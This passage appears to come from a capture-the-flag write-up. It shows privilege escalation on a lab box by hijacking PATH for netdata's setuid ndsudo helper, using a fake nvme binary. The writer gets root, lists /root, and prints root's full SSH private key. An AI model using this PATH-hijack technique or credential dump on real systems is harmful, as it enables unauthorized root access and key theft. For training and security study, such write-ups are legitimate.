drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-resolved.service-jMpAX6
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-timesyncd.service-hW0hLh
drwx------ 3 root root 4096 Nov 7 21:00 systemd-private-12cd875b3b4847b49340fcfcd5342a70-upower.service-1t4RDG
drwx------ 3 root root 4096 Nov 7 20:14 systemd-private-12cd875b3b4847b49340fcfcd5342a70-xwiki.service-uT51Ke
drwx------ 2 oliver oliver 4096 Nov 8 12:30 tmux-1000
drwx------ 2 root root 4096 Nov 7 20:14 vmware-root_612-2731021090
oliver@editor:/tmp$ mkdir -p ~/fakebin
oliver@editor:/tmp$ ls
netdata-ipc systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-resolved.service-jMpAX6 tmux-1000
nvme systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-timesyncd.service-hW0hLh vmware-root_612-2731021090
systemd-private-12cd875b3b4847b49340fcfcd5342a70-ModemManager.service-Nop8ux systemd-private-12cd875b3b4847b49340fcfcd5342a70-upower.service-1t4RDG
systemd-private-12cd875b3b4847b49340fcfcd5342a70-systemd-logind.service-NdU3Ll systemd-private-12cd875b3b4847b49340fcfcd5342a70-xwiki.service-uT51Ke
oliver@editor:/tmp$ cp nvme ~/fakebin
oliver@editor:/tmp$ export PATH=~/fakebin:$PATH
oliver@editor:/tmp$ echo $PATH
/home/oliver/fakebin:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
oliver@editor:/tmp$ which nvme
/home/oliver/fakebin/nvme
oliver@editor:/tmp$
There we go, supposed eariler I just didn’t confirmed it yet. And now supposed if we hijack the path we should’ve been able to be a root access:
oliver@editor:/tmp$ which nvme
/home/oliver/fakebin/nvme
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme
command not recognized: nvme
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
Yes, we’re root now.
<details> <summary>Click to view bash output</summary>root@editor:/root# ls -al
total 44
drwx------ 8 root root 4096 Nov 7 20:14 .
drwxr-xr-x 18 root root 4096 Jul 29 11:55 ..
lrwxrwxrwx 1 root root 9 Jul 1 19:19 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Apr 27 2023 .cache
drwxr-xr-x 2 root root 4096 Jun 19 08:14 .config
drwxr-xr-x 3 root root 4096 Apr 27 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Jun 19 11:30 .ssh
-rw-r----- 1 root root 33 Nov 7 20:14 root.txt
drwxr-xr-x 2 root root 4096 Jun 19 08:14 scripts
drwx------ 3 root root 4096 Apr 27 2023 snap
root@editor:/root# ls -al .ssh
total 20
drwx------ 2 root root 4096 Jun 19 11:30 .
drwx------ 8 root root 4096 Nov 7 20:14 ..
-rw------- 1 root root 565 Jun 19 11:34 authorized_keys
-rw------- 1 root root 2590 Jun 19 11:30 id_rsa
-rw-r--r-- 1 root root 565 Jun 19 11:30 id_rsa.pub
root@editor:/root# cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
FLvpDdK+RXvFcAAAALcm9vdEBlZGl0b3I=
-----END OPENSSH PRIVATE KEY-----
Here’s the RSA.
Hope you all like it and happy hacking!